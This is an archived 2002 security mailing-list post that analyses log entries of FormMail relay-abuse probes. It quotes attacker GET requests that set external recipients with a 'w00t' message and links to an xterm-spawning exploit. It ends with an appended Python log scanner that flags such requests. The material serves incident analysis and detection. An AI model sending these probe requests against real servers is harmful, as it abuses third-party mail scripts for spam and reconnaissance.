Security Incidents mailing list archives
RE: Matt Wright FormMail Attacks
From: Jose Nazario <jose () biocserver BIOC cwru edu>
Date: Mon, 14 Jan 2002 13:19:28 -0500 (EST)
On Mon, 14 Jan 2002, Turner, Keith wrote:
> My guess is one of the following:
> 1) Someone looking to send spam through someone else's webserver. (Seems like that would be very inefficient).
> 2) Someone looking for a new exploit, maybe testing the waters for a new worm.
> 3) Someone looking for a way to "forge" emails. Make it look like it came from an email address of the affected domain. The email header would go right back to an address in the "forged" domain.
my formmail attacks have this general structure:

GET /cgi-bin/formmail.pl?email=someone%40aol%2Ecom&subject=hostname%2Edomain%2Ecom%2Fcgi%2Dbin%2Fformail%2Epl&recipient=c0mik%40hotmail%2Ecom&msg=w00t

recipients have been:

  c0mik () hotmail com (msg=w00t)
  jersyvips () aol com (again, msg=w00t)
  w00tw00t () yahoo com (yet again, msg=w00t)
  Heyheyremeberme9 () aol com (msg=w00t)
  GUILTYBIZ () aol com (msg=w00t)

i don't know if any of those accounts are valid. those are just in the past 10,000 lines or so from my error logs (i don't use FormMail.pl). the use of 'w00t' suggests a younger element (w00t is L33T and all), doubtful it's just simply spam but rather 'hey, this site's got vulnerable cgi-bin stuff'.

spawn an xterm using formmail:
http://packetstorm.widexs.nl/0007-exploits/formmail-xploit.pl

view env vars using formmail:
http://packetstorm.widexs.nl/advisories/blackwatchlabs/BWL-00-06.txt

but i did find that others have been seeing this same basic pattern:

web logs posted on http://icosym-nt.cvut.cz/musage/A2001-12.txt

  /cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=icosym%2ecvut%2ecz%2fcgi%2dbin%2fformmail%2epl&recipient=nightauditer%40aol%2ecom&msg=w00t
  /cgi-bin/formmail.pl?recipient=rmitchell9601 () aol com,&subject=are%20you%20interested%20in%20applying%20your%20skills&email=charresonee () bellsouth net&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl
  /cgi-bin/formmail.pl?recipient=rmitchell9601 () aol com,&subject=find%20that%20long%20lost%20friend%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.&email=lcordee () bellsouth net&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl

http://www.google.com/search?q=cache:L5KlWd3G3D4C:www.kolobrzeg.pl/stats1169/statslog.20011205+formmail+w00t&hl=en

  1Cust129.tnt3.richmond.va.da.uu.net - - [05/Dec/2001:00:10:01 +0100] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Ekolobrzeg%2Epl%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=dreads%40aol%2Ecom&msg=w00t HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 190 "" "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"

etc etc ... formmail + w00t on google brings up a bunch.

from a few more lists, more discussion:
http://ntbugtraq.net/archive/107/244789
http://citadelle.intrinsec.com/mailing/current/HTML/ml_mobile_code/0487.html

hope this helps. it's a bit older, and not a highly visible item, but it's real.

____________________________
jose nazario jose () cwru edu
PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80
PGP key ID 0xFD37F4E5 (pgp.mit.edu)

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
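A defender-side check for the log pattern discussed in this thread, added here as an example and not code from the original post: it parses access-log lines in the format quoted above, URL-decodes the formmail.pl query string, and flags requests whose recipient lies outside the site's own domain, carries the 'w00t' probe marker, or echoes the script path in the subject. The log lines, client IPs and example.com/example.net names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common Log Format prefix, as in the log excerpt quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample lines modelled on the posted pattern (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [05/Dec/2001:00:10:01 +0100] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Eexample%2Ecom%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=dreads%40aol%2Ecom&msg=w00t HTTP/1.1" 404 190 "" "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"
198.51.100.8 - - [05/Dec/2001:00:12:44 +0100] "GET /cgi-bin/formmail.pl?recipient=rmitchell9601%40aol%2Ecom,&subject=are%20you%20interested&email=someone%40example%2Enet HTTP/1.0" 200 512 "" "Mozilla/4.0"
198.51.100.9 - - [05/Dec/2001:00:15:19 +0100] "POST /cgi-bin/formmail.pl HTTP/1.1" 200 300 "http://www.example.com/contact.html" "Mozilla/4.0"
"""

def parse_formmail_requests(log_text, allowed_recipient_domains=("example.com",)):
    """Return one dict per formmail.pl request that names a 'recipient' in the
    query string, with decoded recipient/subject/msg fields and a 'reasons'
    list explaining why the request looks like relay abuse or a probe."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith("/formmail.pl"):
            continue
        q = parse_qs(parts.query, keep_blank_values=True)
        # FormMail accepts a comma-separated recipient list; drop empty items.
        recipients = [r.strip() for r in q.get("recipient", [""])[0].split(",") if r.strip()]
        if not recipients:
            continue  # no recipient in the URL: an ordinary form POST, nothing to classify
        subject = q.get("subject", [""])[0]
        msg = q.get("msg", [""])[0]
        reasons = []
        if any(r.rsplit("@", 1)[-1].lower() not in allowed_recipient_domains for r in recipients):
            reasons.append("external recipient")
        if msg.lower() == "w00t":
            reasons.append("w00t probe marker")
        if "formmail.pl" in subject.lower():
            reasons.append("script path in subject")
        findings.append({"host": m.group("host"), "time": m.group("time"),
                         "recipients": recipients, "subject": subject, "msg": msg,
                         "status": int(m.group("status")), "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in parse_formmail_requests(SAMPLE_LOG):
        print(f["host"], f["status"], f["recipients"], ", ".join(f["reasons"]))
```

A 404 on the flagged line means the script was probed but is not installed; a 200 with an external recipient is the case worth following up.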